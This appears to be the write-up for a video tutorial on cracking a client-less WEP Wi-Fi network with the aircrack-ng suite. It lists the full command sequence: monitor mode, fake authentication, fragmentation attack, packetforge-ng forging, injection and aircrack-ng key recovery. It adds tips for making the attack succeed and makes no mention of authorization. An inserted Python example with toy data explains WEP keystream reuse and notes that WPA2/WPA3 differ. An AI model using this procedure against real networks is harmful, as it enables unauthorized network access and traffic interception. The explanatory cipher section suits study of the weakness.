Video demonstration that shows how to crack a WEP encrypted network with no clients. This is conducted by utilizing aireplay-ng’s fragmentation attack, forging packets with packetforge-ng, and then injecting the forged packets into the network.
macchanger -s [wireless interface] (to discover the wireless card’s MAC address).
airmon-ng start [wireless interface] (start wireless card in monitor mode).
airodump-ng [wireless interface] (finds networks in range of your card).
airodump-ng -c [channel number] --bssid [access point MAC address] -w [outputfilename] [wireless interface] (begin capture file).
aireplay-ng -1 60 -a [AP MAC address] [wireless interface] (fake authentication attack every 60 seconds to avoid timeout).
aireplay-ng -5 -b [AP MAC address] -h [your MAC address] [wireless interface] (fragmentation attack to obtain PRGA/.xor file).
packetforge-ng -0 -a [AP MAC address] -h [your MAC address] -l [source IP] -k [destination IP] -y [the .xor file] -w [outputforgedfilename] (to forge packet for injection attack).
aireplay-ng -2 -r [outputforgedfilename] [wireless interface] (to inject the forged packets).
aircrack-ng -0 [outputfilename.cap] (to decrypt WEP key).
The fragmentation attack is necessary to generate the .xor file we need for the packetforge step.
When doing the packetforge-ng step, the -l option sets the source IP; the attack is more likely to succeed if a known IP address on the network is used. The -k option sets the destination IP; here the attack is more likely to succeed if an IP address that is not in use on the network is selected. In most cases, an address ending in .255 is a safe choice for -k.
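Why the .xor file from the fragmentation step is all packetforge-ng needs, as an added illustration that is not part of the video or of the aircrack-ng suite: WEP encrypts with RC4, a stream cipher, so whoever knows the keystream (PRGA) for a given IV can encrypt arbitrary data under that IV without ever learning the WEP key. All byte values below are constructed toy data, not real RC4 output.

```python
# Constructed illustration of the WEP weakness behind the .xor/PRGA file.
# WEP: ciphertext = plaintext XOR RC4(key, IV). The keystream is the only secret
# that matters per frame, and it leaks whenever some plaintext bytes are known.

def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two equal-length byte strings."""
    if len(a) != len(b):
        raise ValueError("length mismatch")
    return bytes(x ^ y for x, y in zip(a, b))

# Constructed: the keystream the AP "used" for one IV (stands in for RC4 output),
# and a frame whose leading plaintext bytes are predictable: the LLC/SNAP header
# of an IP packet followed by the start of an IPv4 header.
KEYSTREAM = bytes.fromhex("9f1c3a7be02d4456c8a1f03e6b2d5c7a")
KNOWN_PLAINTEXT = bytes.fromhex("aaaa03000000080045000054")
captured_ciphertext = xor_bytes(KNOWN_PLAINTEXT, KEYSTREAM[:len(KNOWN_PLAINTEXT)])

def recover_keystream(ciphertext: bytes, known_plaintext: bytes) -> bytes:
    """Known-plaintext recovery: keystream = ciphertext XOR plaintext.
    This is what the fragmentation step writes out as the .xor file."""
    return xor_bytes(ciphertext, known_plaintext)

def encrypt_with_keystream(plaintext: bytes, keystream: bytes) -> bytes:
    """Encrypt under the same IV using only the recovered keystream, no key needed.
    A frame longer than the recovered keystream cannot be forged this way."""
    if len(plaintext) > len(keystream):
        raise ValueError("not enough keystream recovered for this frame length")
    return xor_bytes(plaintext, keystream[:len(plaintext)])

def demo() -> bool:
    """Recover the PRGA from one frame, encrypt a different frame with it, and
    confirm the AP (which reuses the same IV keystream) decrypts it as intended."""
    prga = recover_keystream(captured_ciphertext, KNOWN_PLAINTEXT)
    forged_plain = bytes.fromhex("aaaa03000000080045000030")  # different IPv4 length field
    forged_cipher = encrypt_with_keystream(forged_plain, prga)
    return xor_bytes(forged_cipher, KEYSTREAM[:len(forged_cipher)]) == forged_plain
```

WPA2 and WPA3 do not share this property: CCMP/GCMP use authenticated encryption with per-frame nonces, so a recovered keystream segment neither repeats nor lets a forged frame pass integrity checking.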
The aireplay-ng -2 attack allows you to inject a specific file into the network. If you are attacking a network into which you have previously injected packets successfully, you may inject the same packet again by using aireplay-ng -2 -r [filename].
During the key-recovery phase of the attack, the -0 in aircrack-ng only colors the terminal output and is completely optional.
In some cases, a router’s settings may have stronger security, and will not allow you to maintain your fake authentication. If this is the case, you will need to use a different method to attack the network.